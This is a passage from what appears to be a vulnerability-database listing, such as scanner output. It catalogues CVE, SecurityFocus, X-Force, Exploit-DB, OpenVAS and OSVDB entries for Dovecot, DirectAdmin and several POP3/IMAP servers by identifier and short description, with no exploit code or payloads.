3900| [53277] Dovecot up to 1.2.10 denial of service
3901| [50082] Dovecot up to 1.1.6 Stack-based memory corruption
3902| [48756] Jbmc-software DirectAdmin up to 1.292 cross site scripting
3903| [48060] Jbmc-software DirectAdmin up to 1.17 privilege escalation
3904| [45256] Dovecot up to 1.1.5 directory traversal
3905| [44846] Dovecot 1.1.4/1.1.5 IMAP Client Crash denial of service
3906| [44546] Dovecot up to 1.0.x Access Restriction unknown vulnerability
3907| [44545] Dovecot up to 1.0.x Access Restriction unknown vulnerability
3908| [41430] Dovecot 1.0.12/1.1 Locking unknown vulnerability
3909| [40356] Dovecot 1.0.9 Cache unknown vulnerability
3910| [38747] DirectAdmin 1.30.2 cross site scripting
3911| [38222] Dovecot 1.0.2 directory traversal
3912| [37578] DirectAdmin 1.30.1 cross site scripting
3913| [36376] Dovecot up to 1.0.x directory traversal
3914| [36066] JBMC Software DirectAdmin 1.293 cross site scripting
3915| [35680] Jbmc Software DirectAdmin 1.293 cross site scripting
3916| [33341] JBMC Software DirectAdmin 1.28.1 cross site scripting
3917| [33332] Timo Sirainen Dovecot up to 1.0test53 Off-By-One memory corruption
3918| [30268] Timo Sirainen Dovecot 1.0/1.0 Beta2/1.0 Beta3/1.0 Beta7 directory traversal
3919| [30021] Jbmc Software DirectAdmin 1.26.6 cross site scripting
3920|
3921| MITRE CVE - https://cve.mitre.org:
3922| [CVE-2012-5305] Cross-site scripting (XSS) vulnerability in CMD_DOMAIN in JBMC Software DirectAdmin 1.403 allows remote attackers to inject arbitrary web script or HTML via the domain parameter.
3923| [CVE-2012-3842] Multiple cross-site scripting (XSS) vulnerabilities in CMD_DOMAIN in JBMC Software DirectAdmin 1.403 allow remote authenticated users with certain privileges to inject arbitrary web script or HTML via the (1) select0 or (2) select8 parameters.
3924| [CVE-2011-5033] Stack-based buffer overflow in CFS.c in ConfigServer Security & Firewall (CSF) before 5.43, when running on a DirectAdmin server, allows local users to cause a denial of service (crash) via a long string in an admin.list file.
3925| [CVE-2011-4318] Dovecot 2.0.x before 2.0.16, when ssl or starttls is enabled and hostname is used to define the proxy destination, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a valid certificate for a different hostname.
3926| [CVE-2011-2167] script-login in Dovecot 2.0.x before 2.0.13 does not follow the chroot configuration setting, which might allow remote authenticated users to conduct directory traversal attacks by leveraging a script.
3927| [CVE-2011-2166] script-login in Dovecot 2.0.x before 2.0.13 does not follow the user and group configuration settings, which might allow remote authenticated users to bypass intended access restrictions by leveraging a script.
3928| [CVE-2011-1929] lib-mail/message-header-parser.c in Dovecot 1.2.x before 1.2.17 and 2.0.x before 2.0.13 does not properly handle '\0' characters in header names, which allows remote attackers to cause a denial of service (daemon crash or mailbox corruption) via a crafted e-mail message.
3929| [CVE-2010-4011] Dovecot in Apple Mac OS X 10.6.5 10H574 does not properly manage memory for user names, which allows remote authenticated users to read the private e-mail of other persons in opportunistic circumstances via standard e-mail clients accessing a user's own mailbox, related to a "memory aliasing issue."
3930| [CVE-2010-3780] Dovecot 1.2.x before 1.2.15 allows remote authenticated users to cause a denial of service (master process outage) by simultaneously disconnecting many (1) IMAP or (2) POP3 sessions.
3931| [CVE-2010-3779] Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.beta2 grants the admin permission to the owner of each mailbox in a non-public namespace, which might allow remote authenticated users to bypass intended access restrictions by changing the ACL of a mailbox, as demonstrated by a symlinked shared mailbox.
3932| [CVE-2010-3707] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving more specific entries that occur after less specific entries, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
3933| [CVE-2010-3706] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving the private namespace of a user, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
3934| [CVE-2010-3304] The ACL plugin in Dovecot 1.2.x before 1.2.13 propagates INBOX ACLs to newly created mailboxes in certain configurations, which might allow remote attackers to read mailboxes that have unintended weak ACLs.
3935| [CVE-2010-0745] Unspecified vulnerability in Dovecot 1.2.x before 1.2.11 allows remote attackers to cause a denial of service (CPU consumption) via long headers in an e-mail message.
3936| [CVE-2010-0535] Dovecot in Apple Mac OS X 10.6 before 10.6.3, when Kerberos is enabled, does not properly enforce the service access control list (SACL) for sending and receiving e-mail, which allows remote authenticated users to bypass intended access restrictions via unspecified vectors.
3937| [CVE-2010-0433] The kssl_keytab_is_available function in ssl/kssl.c in OpenSSL before 0.9.8n, when Kerberos is enabled but Kerberos configuration files cannot be opened, does not check a certain return value, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via SSL cipher negotiation, as demonstrated by a chroot installation of Dovecot or stunnel without Kerberos configuration files inside the chroot.
3938| [CVE-2009-3897] Dovecot 1.2.x before 1.2.8 sets 0777 permissions during creation of certain directories at installation time, which allows local users to access arbitrary user accounts by replacing the auth socket, related to the parent directories of the base_dir directory, and possibly the base_dir directory itself.
3939| [CVE-2009-3235] Multiple stack-based buffer overflows in the Sieve plugin in Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, as derived from Cyrus libsieve, allow context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted SIEVE script, as demonstrated by forwarding an e-mail message to a large number of recipients, a different vulnerability than CVE-2009-2632.
3940| [CVE-2009-2632] Buffer overflow in the SIEVE script component (sieve/script.c), as used in cyrus-imapd in Cyrus IMAP Server 2.2.13 and 2.3.14, and Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, allows local users to execute arbitrary code and read or modify arbitrary messages via a crafted SIEVE script, related to the incorrect use of the sizeof operator for determining buffer length, combined with an integer signedness error.
3941| [CVE-2009-2216] Cross-site scripting (XSS) vulnerability in CMD_REDIRECT in DirectAdmin 1.33.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the URI in a view=advanced request.
3942| [CVE-2009-1526] JBMC Software DirectAdmin before 1.334 allows local users to create or overwrite any file via a symlink attack on an arbitrary file in a certain temporary directory, related to a request for this temporary file in the PATH_INFO to the CMD_DB script during a backup action.
3943| [CVE-2009-1525] CMD_DB in JBMC Software DirectAdmin before 1.334 allows remote authenticated users to gain privileges via shell metacharacters in the name parameter during a restore action.
3944| [CVE-2008-5301] Directory traversal vulnerability in the ManageSieve implementation in Dovecot 1.0.15, 1.1, and 1.2 allows remote attackers to read and modify arbitrary .sieve files via a ".." (dot dot) in a script name.
3945| [CVE-2008-4907] The message parsing feature in Dovecot 1.1.4 and 1.1.5, when using the FETCH ENVELOPE command in the IMAP client, allows remote attackers to cause a denial of service (persistent crash) via an email with a malformed From address, which triggers an assertion error, aka "invalid message address parsing bug."
3946| [CVE-2008-4870] dovecot 1.0.7 in Red Hat Enterprise Linux (RHEL) 5, and possibly Fedora, uses world-readable permissions for dovecot.conf, which allows local users to obtain the ssl_key_password parameter value.
3947| [CVE-2008-4578] The ACL plugin in Dovecot before 1.1.4 allows attackers to bypass intended access restrictions by using the "k" right to create unauthorized "parent/child/child" mailboxes.
3948| [CVE-2008-4577] The ACL plugin in Dovecot before 1.1.4 treats negative access rights as if they are positive access rights, which allows attackers to bypass intended access restrictions.
3949| [CVE-2008-1218] Argument injection vulnerability in Dovecot 1.0.x before 1.0.13, and 1.1.x before 1.1.rc3, when using blocking passdbs, allows remote attackers to bypass the password check via a password containing TAB characters, which are treated as argument delimiters that enable the skip_password_check field to be specified.
3950| [CVE-2008-1199] Dovecot before 1.0.11, when configured to use mail_extra_groups to allow Dovecot to create dotlocks in /var/mail, might allow local users to read sensitive mail files for other users, or modify files or directories that are writable by group, via a symlink attack.
3951| [CVE-2007-6598] Dovecot before 1.0.10, with certain configuration options including use of %variables, does not properly maintain the LDAP+auth cache, which might allow remote authenticated users to login as a different user who has the same password.
3952| [CVE-2007-5794] Race condition in nss_ldap, when used in applications that are linked against the pthread library and fork after a call to nss_ldap, might send user data to the wrong process because of improper handling of the LDAP connection. NOTE: this issue was originally reported for Dovecot with the wrong mailboxes being returned, but other applications might also be affected.
3953| [CVE-2007-4830] Cross-site scripting (XSS) vulnerability in CMD_BANDWIDTH_BREAKDOWN in DirectAdmin 1.30.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the user parameter.
3954| [CVE-2007-4211] The ACL plugin in Dovecot before 1.0.3 allows remote authenticated users with the insert right to save certain flags via a (1) COPY or (2) APPEND command.
3955| [CVE-2007-3501] Cross-site scripting (XSS) vulnerability in CMD_USER_STATS in DirectAdmin 1.30.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the domain parameter, a different vector than CVE-2007-1508.
3956| [CVE-2007-2231] Directory traversal vulnerability in index/mbox/mbox-storage.c in Dovecot before 1.0.rc29, when using the zlib plugin, allows remote attackers to read arbitrary gzipped (.gz) mailboxes (mbox files) via a .. (dot dot) sequence in the mailbox name.
3957| [CVE-2007-2173] Eval injection vulnerability in (1) courier-imapd.indirect and (2) courier-pop3d.indirect in Courier-IMAP before 4.0.6-r2, and 4.1.x before 4.1.2-r1, on Gentoo Linux allows remote attackers to execute arbitrary commands via the XMAILDIR variable, related to the LOGINRUN variable.
3958| [CVE-2007-1926] Cross-site scripting (XSS) vulnerability in JBMC Software DirectAdmin before 1.293 does not properly display log files, which allows remote authenticated users to inject arbitrary web script or HTML via (1) http or (2) ftp requests logged in /var/log/directadmin/security.log
3959| [CVE-2007-1508] Cross-site scripting (XSS) vulnerability in CMD_USER_STATS in DirectAdmin allows remote attackers to inject arbitrary web script or HTML via the RESULT parameter, a different vector than CVE-2006-5983.
3960| [CVE-2007-0618] Unspecified vulnerability in (1) pop3d, (2) pop3ds, (3) imapd, and (4) imapds in IBM AIX 5.3.0 has unspecified impact and attack vectors, involving an "authentication vulnerability."
3961| [CVE-2006-5983] Multiple cross-site scripting (XSS) vulnerabilities in JBMC Software DirectAdmin 1.28.1 allow remote authenticated users to inject arbitrary web script or HTML via the (1) user parameter to (a) CMD_SHOW_RESELLER or (b) CMD_SHOW_USER in the Admin level
3962| [CVE-2006-5973] Off-by-one buffer overflow in Dovecot 1.0test53 through 1.0.rc14, and possibly other versions, when index files are used and mmap_disable is set to "yes," allows remote authenticated IMAP or POP3 users to cause a denial of service (crash) via unspecified vectors involving the cache file.
3963| [CVE-2006-2502] Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2.3.2, when the popsubfolders option is enabled, allows remote attackers to execute arbitrary code via a long USER command.
3964| [CVE-2006-2414] Directory traversal vulnerability in Dovecot 1.0 beta and 1.0 allows remote attackers to list files and directories under the mbox parent directory and obtain mailbox names via ".." sequences in the (1) LIST or (2) DELETE IMAP command.
3965| [CVE-2006-2153] Cross-site scripting (XSS) vulnerability in HTM_PASSWD in DirectAdmin Hosting Management allows remote attackers to inject arbitrary web script or HTML via the domain parameter.
3966| [CVE-2006-0730] Multiple unspecified vulnerabilities in Dovecot before 1.0beta3 allow remote attackers to cause a denial of service (application crash or hang) via unspecified vectors involving (1) "potential hangs" in the APPEND command and "potential crashes" in (2) dovecot-auth and (3) imap/pop3-login. NOTE: vector 2 might be related to a double free vulnerability.
3967| [CVE-2002-0925] Format string vulnerability in mmsyslog function allows remote attackers to execute arbitrary code via (1) the USER command to mmpop3d for mmmail 0.0.13 and earlier, (2) the HELO command to mmsmtpd for mmmail 0.0.13 and earlier, or (3) the USER command to mmftpd 0.0.7 and earlier.
3968| [CVE-2001-0143] vpop3d program in linuxconf 1.23r and earlier allows local users to overwrite arbitrary files via a symlink attack.
3969| [CVE-2000-1197] POP2 or POP3 server (pop3d) in imap-uw IMAP package on FreeBSD and other operating systems creates lock files with predictable names, which allows local users to cause a denial of service (lack of mail access) for other users by creating lock files for other mail boxes.
3970| [CVE-1999-1445] Vulnerability in imapd and ipop3d in Slackware 3.4 and 3.3 with shadowing enabled, and possibly other operating systems, allows remote attackers to cause a core dump via a short sequence of USER and PASS commands that do not provide valid usernames or passwords.
3971|
3972| SecurityFocus - https://www.securityfocus.com/bid/:
3973| [103201] Dovecot CVE-2017-14461 Out-Of-Bounds Read Information Disclosure Vulnerability
3974| [97536] Dovecot CVE-2017-2669 Denial of Service Vulnerability
3975| [94639] Dovecot Auth Component CVE-2016-8652 Denial of Service Vulnerability
3976| [91175] Dovecot CVE-2016-4982 Local Information Disclosure Vulnerability
3977| [84736] Dovecot CVE-2008-4870 Local Security Vulnerability
3978| [83952] DirectAdmin CVE-2006-2153 Cross-Site Scripting Vulnerability
3979| [74335] Dovecot 'ssl-proxy-openssl.c' Remote Denial of Service Vulnerability
3980| [67306] Dovecot Denial of Service Vulnerability
3981| [67219] akpop3d 'pszQuery' Remote Memory Corruption Vulnerability
3982| [63911] Installatron Plugin for DirectAdmin Insecure Temporary File Creation Vulnerability
3983| [63373] Installatron Plugin for DirectAdmin cURL Output Remote Privilege Escalation Vulnerability
3984| [63367] Dovecot Checkpassword Authentication Protocol Local Authentication Bypass Vulnerability
3985| [62929] DirectAdmin Backup Multiple Security Vulnerabilities
3986| [61763] RETIRED: Dovecot 'LIST' Command Denial of Service Vulnerability
3987| [61017] DirectAdmin Symlink Attack Multiple Remote Privilege Escalation Vulnerabilities
3988| [60465] Exim for Dovecot 'use_shell' Remote Command Execution Vulnerability
3989| [60052] Dovecot 'APPEND' Parameter Denial of Service Vulnerability
3990| [56759] RETIRED: Dovecot 'mail-search.c' Denial of Service Vulnerability
3991| [53281] DirectAdmin Multiple Cross Site Scripting Vulnerabilities
3992| [52848] RETIRED: DirectAdmin 'CMD_DOMAIN' Cross-Site Scripting Vulnerability
3993| [52845] JBMC Software DirectAdmin 'domain' Parameter Cross Site Scripting Vulnerability
3994| [50709] Dovecot SSL Certificate 'Common Name' Field Validation Security Bypass Vulnerability
3995| [48003] Dovecot 'script-login' Multiple Security Bypass Vulnerabilities
3996| [47930] Dovecot Header Name NULL Character Denial of Service Vulnerability
3997| [47693] DirectAdmin 'mysql_backup' Folder Permissions Information Disclosure Vulnerability
3998| [47690] DirectAdmin Hard Link Local Privilege Escalation Vulnerability
3999| [44874] Apple Mac OS X Dovecot (CVE-2010-4011) Memory Corruption Vulnerability
4000| [43690] Dovecot Access Control List (ACL) Multiple Remote Vulnerabilities
4001| [41964] Dovecot Access Control List (ACL) Plugin Security Bypass Weakness
4002| [39838] tpop3d Remote Denial of Service Vulnerability
4003| [39258] Dovecot Service Control Access List Security Bypass Vulnerability
4004| [38721] DirectAdmin 'CMD_DB_VIEW' Cross-Site Scripting Vulnerability
4005| [37084] Dovecot Insecure 'base_dir' Permissions Local Privilege Escalation Vulnerability
4006| [36377] Dovecot Sieve Plugin Multiple Unspecified Buffer Overflow Vulnerabilities
4007| [35450] DirectAdmin 'CMD_REDIRECT' Cross-Site Scripting Vulnerability
4008| [34678] DirectAdmin '/CMD_DB' Restore Action Local Privilege Escalation Vulnerability
4009| [34676] DirectAdmin '/CMD_DB' Backup Action Insecure Temporary File Creation Vulnerability
4010| [32582] Dovecot ManageSieve Service '.sieve' Files Directory Traversal Vulnerability
4011| [31997] Dovecot Invalid Message Address Parsing Denial of Service Vulnerability
4012| [31587] Dovecot ACL Plugin Multiple Security Bypass Vulnerabilities
4013| [28181] Dovecot 'Tab' Character Password Check Security Bypass Vulnerability
4014| [28092] Dovecot 'mail_extra_groups' Insecure Settings Local Unauthorized Access Vulnerability
4015| [27093] Dovecot Authentication Cache Security Bypass Vulnerability
4016| [25607] DirectAdmin CMD_BANDWIDTH_BREAKDOWN Cross-Site Scripting Vulnerability
4017| [25182] Dovecot ACL Plugin Security Bypass Vulnerability
4018| [24688] DirectAdmin Domain Parameter Cross-Site Scripting Vulnerability
4019| [23552] Dovecot Zlib Plugin Remote Information Disclosure Vulnerability
4020| [23254] DirectAdmin Logfile HTML Injection Vulnerability
4021| [22996] DirectAdmin CMD_USER_STATS Cross-Site Scripting Vulnerability
4022| [22262] IBM AIX Pop3D/Pop3DS/IMapD/IMapDS Authentication Bypass Vulnerability
4023| [21183] Dovecot IMAP Server Mapped Pages Off-By-One Buffer Overflow Vulnerability
4024| [21049] DirectAdmin Multiple Cross-Site Scripting Vulnerabilities
4025| [18056] Cyrus IMAPD POP3D Remote Buffer Overflow Vulnerability
4026| [17961] Dovecot Remote Information Disclosure Vulnerability
4027| [16672] Dovecot Double Free Denial of Service Vulnerability
4028| [8495] akpop3d User Name SQL Injection Vulnerability
4029| [8473] Vpop3d Remote Denial Of Service Vulnerability
4030| [3990] ZPop3D Bad Login Logging Failure Vulnerability
4031| [2781] DynFX MailServer POP3d Denial of Service Vulnerability
4032|
4033| IBM X-Force - https://exchange.xforce.ibmcloud.com:
4034| [86382] Dovecot POP3 Service denial of service
4035| [85490] DirectAdmin Backup System email account functionality symlink
4036| [85488] DirectAdmin Backup System symlink
4037| [84396] Dovecot IMAP APPEND denial of service
4038| [80453] Dovecot mail-search.c denial of service
4039| [74569] DirectAdmin CMD_DOMAIN cross-site scripting
4040| [72685] DirectAdmin domain parameter cross-site request forgery
4041| [71354] Dovecot SSL Common Name (CN) weak security
4042| [67675] Dovecot script-login security bypass
4043| [67674] Dovecot script-login directory traversal
4044| [67589] Dovecot header name denial of service
4045| [67254] DirectAdmin MySQL information disclosure
4046| [67253] DirectAdmin hard link privilege escalation
4047| [63267] Apple Mac OS X Dovecot information disclosure
4048| [62340] Dovecot mailbox security bypass
4049| [62339] Dovecot IMAP or POP3 denial of service
4050| [62256] Dovecot mailbox security bypass
4051| [62255] Dovecot ACL entry security bypass
4052| [60639] Dovecot ACL plugin weak security
4053| [57267] Apple Mac OS X Dovecot Kerberos security bypass
4054| [56875] DirectAdmin name cross-site scripting
4055| [56763] Dovecot header denial of service
4056| [55181] DirectAdmin account cross-site request forgery
4057| [54363] Dovecot base_dir privilege escalation
4058| [53248] CMU Sieve plugin for Dovecot unspecified buffer overflow
4059| [51292] DirectAdmin CMD_REDIRECT cross-site scripting
4060| [50167] DirectAdmin CMD_DB command execution
4061| [49416] DirectAdmin CMD_DB backup action symlink
4062| [46323] Dovecot dovecot.conf information disclosure
4063| [46227] Dovecot message parsing denial of service
4064| [45669] Dovecot ACL mailbox security bypass
4065| [45667] Dovecot ACL plugin rights security bypass
4066| [41085] Dovecot TAB characters authentication bypass
4067| [41009] Dovecot mail_extra_groups option unauthorized access
4068| [39342] Dovecot LDAP auth cache configuration security bypass
4069| [36510] DirectAdmin user parameter cross-site scripting
4070| [35767] Dovecot ACL plugin security bypass
4071| [35177] DirectAdmin domain parameter cross-site scripting
4072| [34082] Dovecot mbox-storage.c directory traversal
4073| [33390] DirectAdmin log file cross-site scripting
4074| [33023] DirectAdmin CMD_USER_STATS form cross-site scripting
4075| [30433] Dovecot IMAP/POP3 server dovecot.index.cache buffer overflow
4076| [30256] DirectAdmin user, TYPE, and name parameters cross-site scripting
4077| [26578] Cyrus IMAP pop3d buffer overflow
4078| [26536] Dovecot IMAP LIST information disclosure
4079| [24710] Dovecot dovecot-auth and imap/pop3-login denial of service
4080| [24709] Dovecot APPEND command denial of service
4081| [13018] akpop3d authentication code SQL injection
4082| [7345] Slackware Linux imapd and ipop3d core dump
4083| [6269] imap, ipop2d and ipop3d buffer overflows
4084| [5923] Linuxconf vpop3d symbolic link
4085| [4918] IPOP3D, Buffer overflow attack
4086| [1560] IPOP3D, user login successful
4087| [1559] IPOP3D user login to remote host successful
4088| [1525] IPOP3D, user logout
4089| [1524] IPOP3D, user auto-logout
4090| [1523] IPOP3D, user login failure
4091| [1522] IPOP3D, brute force attack
4092| [1521] IPOP3D, user kiss of death logout
4093| [418] pop3d mktemp creates insecure temporary files
4094|
4095| Exploit-DB - https://www.exploit-db.com:
4096| [29747] DirectAdmin 1.292 CMD_USER_STATS Cross-Site Scripting Vulnerability
4097| [29006] DirectAdmin 1.28/1.29 CMD_FTP_SHOW DOMAIN Parameter XSS
4098| [29005] DirectAdmin 1.28/1.29 CMD_EMAIL_LIST name Parameter XSS
4099| [29004] DirectAdmin 1.28/1.29 CMD_EMAIL_VACATION_MODIFY user Parameter XSS
4100| [29003] DirectAdmin 1.28/1.29 CMD_TICKET type Parameter XSS
4101| [29002] DirectAdmin 1.28/1.29 CMD_EMAIL_FORWARDER_MODIFY user Parameter XSS
4102| [29001] DirectAdmin 1.28/1.29 CMD_TICKET_CREATE TYPE Parameter XSS
4103| [29000] DirectAdmin 1.28/1.29 CMD_SHOW_USER user Parameter XSS
4104| [28999] DirectAdmin 1.28/1.29 CMD_SHOW_RESELLER user Parameter XSS
4105| [25297] Dovecot with Exim sender_address Parameter - Remote Command Execution
4106| [23053] Vpop3d Remote Denial of Service Vulnerability
4107| [16836] Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
4108| [11893] tPop3d 1.5.3 DoS
4109| [11813] DirectAdmin 1.34.4 - Multi CSRF vulnerability
4110| [11029] DirectAdmin <= 1.33.6 Symlink Permission Bypass
4111| [10779] DirectAdmin 1.34.0 - CSRF Create Administrator Vulnerability
4112| [5257] Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure Exploit
4113| [2185] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3)
4114| [2053] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (2)
4115| [1813] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit
4116|
4117| OpenVAS (Nessus) - http://www.openvas.org:
4118| [901026] Dovecot Sieve Plugin Multiple Buffer Overflow Vulnerabilities
4119| [901025] Dovecot Version Detection
4120| [881402] CentOS Update for dovecot CESA-2011:1187 centos5 x86_64
4121| [881358] CentOS Update for dovecot CESA-2011:1187 centos4 x86_64
4122| [880980] CentOS Update for dovecot CESA-2011:1187 centos5 i386
4123| [880967] CentOS Update for dovecot CESA-2011:1187 centos4 i386
4124| [870607] RedHat Update for dovecot RHSA-2011:0600-01
4125| [870471] RedHat Update for dovecot RHSA-2011:1187-01
4126| [870153] RedHat Update for dovecot RHSA-2008:0297-02
4127| [863272] Fedora Update for dovecot FEDORA-2011-7612
4128| [863115] Fedora Update for dovecot FEDORA-2011-7258
4129| [861525] Fedora Update for dovecot FEDORA-2007-664
4130| [861394] Fedora Update for dovecot FEDORA-2007-493
4131| [861333] Fedora Update for dovecot FEDORA-2007-1485
4132| [860845] Fedora Update for dovecot FEDORA-2008-9202
4133| [860663] Fedora Update for dovecot FEDORA-2008-2475
4134| [860169] Fedora Update for dovecot FEDORA-2008-2464
4135| [860089] Fedora Update for dovecot FEDORA-2008-9232
4136| [840950] Ubuntu Update for dovecot USN-1295-1
4137| [840668] Ubuntu Update for dovecot USN-1143-1
4138| [840583] Ubuntu Update for dovecot vulnerabilities USN-1059-1
4139| [840335] Ubuntu Update for dovecot vulnerabilities USN-593-1
4140| [840290] Ubuntu Update for dovecot vulnerability USN-567-1
4141| [840234] Ubuntu Update for dovecot vulnerability USN-666-1
4142| [840072] Ubuntu Update for dovecot vulnerability USN-487-1
4143| [831405] Mandriva Update for dovecot MDVSA-2011:101 (dovecot)
4144| [831230] Mandriva Update for dovecot MDVSA-2010:217 (dovecot)
4145| [831197] Mandriva Update for dovecot MDVSA-2010:196 (dovecot)
4146| [831054] Mandriva Update for dovecot MDVSA-2010:104 (dovecot)
4147| [830496] Mandriva Update for dovecot MDVSA-2008:232 (dovecot)
4148| [801055] Dovecot 'base_dir' Insecure Permissions Security Bypass Vulnerability
4149| [800030] Dovecot ACL Plugin Security Bypass Vulnerabilities
4150| [70767] Gentoo Security Advisory GLSA 201110-04 (Dovecot)
4151| [70259] FreeBSD Ports: dovecot
4152| [69959] Debian Security Advisory DSA 2252-1 (dovecot)
4153| [66522] FreeBSD Ports: dovecot
4154| [65010] Ubuntu USN-838-1 (dovecot)
4155| [64978] Debian Security Advisory DSA 1892-1 (dovecot)
4156| [64953] Mandrake Security Advisory MDVSA-2009:242-1 (dovecot)
4157| [64952] Mandrake Security Advisory MDVSA-2009:242 (dovecot)
4158| [64861] Fedora Core 10 FEDORA-2009-9559 (dovecot)
4159| [62965] Gentoo Security Advisory GLSA 200812-16 (dovecot)
4160| [62854] FreeBSD Ports: dovecot-managesieve
4161| [61916] FreeBSD Ports: dovecot
4162| [60588] Gentoo Security Advisory GLSA 200803-25 (dovecot)
4163| [60568] Debian Security Advisory DSA 1516-1 (dovecot)
4164| [60528] FreeBSD Ports: dovecot
4165| [60134] Debian Security Advisory DSA 1457-1 (dovecot)
4166| [60089] FreeBSD Ports: dovecot
4167| [58578] Debian Security Advisory DSA 1359-1 (dovecot)
4168| [56834] Debian Security Advisory DSA 1080-1 (dovecot)
4169|
4170| SecurityTracker - https://www.securitytracker.com:
4171| [1028744] DirectAdmin Backup System Flaws Let Local Users Gain Elevated Privileges
4172| [1028585] Dovecot APPEND Parameter Processing Flaw Lets Remote Authenticated Users Deny Service
4173| [1024740] Mac OS X Server Dovecot Memory Aliasing Bug May Cause Mail to Be Delivered to the Wrong User
4174| [1017288] Dovecot POP3/IMAP Cache File Buffer Overflow May Let Remote Users Execute Arbitrary Code
4175|
4176| OSVDB - http://www.osvdb.org:
4177| [96172] Dovecot POP3 Service Terminated LIST Command Remote DoS
4178| [94899] DirectAdmin Backup System Unspecified Email Account Function Symlink Local Privilege Escalation
4179| [94898] DirectAdmin Backup System Unspecified Symlink Arbitrary File Manipulation Local Privilege Escalation
4180| [93525] Dovecot IMAP APPEND Command Malformed Parameter Parsing Remote DoS
4181| [93004] Dovecot with Exim sender_address Parameter Remote Command Execution
4182| [88058] Dovecot lib-storage/mail-search.c Multiple Keyword Search Handling Remote DoS
4183| [80919] DirectAdmin CMD_DOMAIN Multiple Parameter XSS
4184| [77185] Dovecot SSL Certificate Common Name Field MitM Spoofing Weakness
4185| [74515] Dovecot script-login chroot Configuration Setting Traversal Arbitrary File Access
4186| [74514] Dovecot script-login User / Group Configuration Settings Remote Access Restriction Bypass
4187| [72495] Dovecot lib-mail/message-header-parser.c Mail Header Name NULL Character Handling Remote DoS
4188| [72120] DirectAdmin mysql_backups Folder MySQL Database Backup Local Disclosure
4189| [72119] DirectAdmin Backup Creation Hard Link Check Weakness Local Privilege Escalation
4190| [69260] Apple Mac OS X Server Dovecot Memory Aliasing Mail Delivery Issue
4191| [68516] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition User Private Namespace Mailbox Access Restriction Remote Bypass
4192| [68515] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition Specific Entry Order Mailbox Access Restriction Remote Bypass
4193| [68513] Dovecot Non-public Namespace Mailbox ACL Manipulation Access Restriction Remote Bypass
4194| [68512] Dovecot IMAP / POP3 Session Disconnect Master Process Outage Remote DoS
4195| [66625] Dovecot ACL Plugin INBOX ACL Copying Weakness Restriction Bypass
4196| [66113] Dovecot Mail Root Directory Creation Permission Weakness
4197| [66112] Dovecot Installation base_dir Parent Directory Permission Weakness
4198| [66111] Dovecot SEARCH Functionality str_find_init() Function Overflow
4199| [66110] Dovecot Multiple Unspecified Buffer Overflows
4200| [66108] Dovecot Malformed Message Body Processing Unspecified Functions Remote DoS
4201| [64783] Dovecot E-mail Message Header Unspecified DoS
4202| [63372] Apple Mac OS X Dovecot Kerberos Authentication SACL Restriction Bypass
4203| [62914] DirectAdmin CMD_DB_VIEW name Parameter XSS
4204| [62796] Dovecot mbox Format Email Header Handling DoS
4205| [61395] DirectAdmin Admin Account Creation CSRF
4206| [60316] Dovecot base_dir Directory Permission Weakness Local Privilege Escalation
4207| [58103] Dovecot CMU Sieve Plugin Script Handling Multiple Overflows
4208| [55296] DirectAdmin CMD_REDIRECT URL Parameter XSS
4209| [54015] DirectAdmin CMD_DB name Parameter Shell Metacharacter Arbitrary Command Execution
4210| [54014] DirectAdmin CMD_DB Database Backup Request Temporary File Symlink Arbitrary File Overwrite
4211| [50253] Dovecot dovecot.conf Permission Weakness Local ssl_key_password Parameter Disclosure
4212| [49918] Dovecot ManageSieve Script Name Handling Traversal Arbitrary File Manipulation
4213| [49429] Dovecot Message Parsing Feature Crafted Email Header Handling Remote DoS
4214| [49099] Dovecot ACL Plugin k Right Mailbox Creation Restriction Bypass
4215| [49098] Dovecot ACL Plugin Negative Access Rights Bypass
4216| [43137] Dovecot mail_extra_groups Symlink File Manipulation
4217| [42979] Dovecot passdbs Argument Injection Authentication Bypass
4218| [39876] Dovecot LDAP Auth Cache Security Bypass
4219| [39386] Dovecot ACL Plugin Insert Right APPEND / COPY Command Unauthorized Flag Manipulation
4220| [36999] DirectAdmin CMD_BANDWIDTH_BREAKDOWN user Parameter XSS
4221| [36339] DirectAdmin CMD_USER_STATS domain Parameter XSS
4222| [35489] Dovecot index/mbox/mbox-storage.c Traversal Arbitrary Gzip File Access
4223| [34687] DirectAdmin http/ftp XSS Log Viewer Data Injection
4224| [34273] DirectAdmin CMD_USER_STATS RESULT Parameter XSS
4225| [32676] DirectAdmin CMD_FTP_SHOW DOMAIN Parameter XSS
4226| [32675] DirectAdmin CMD_EMAIL_LIST name Parameter XSS
4227| [32674] DirectAdmin CMD_EMAIL_VACATION_MODIFY user Parameter XSS
4228| [32673] DirectAdmin CMD_TICKET type Parameter XSS
4229| [32672] DirectAdmin CMD_EMAIL_FORWARDER_MODIFY user Parameter XSS
4230| [32671] DirectAdmin CMD_TICKET_CREATE TYPE Parameter XSS
4231| [32670] DirectAdmin CMD_SHOW_USER user Parameter XSS
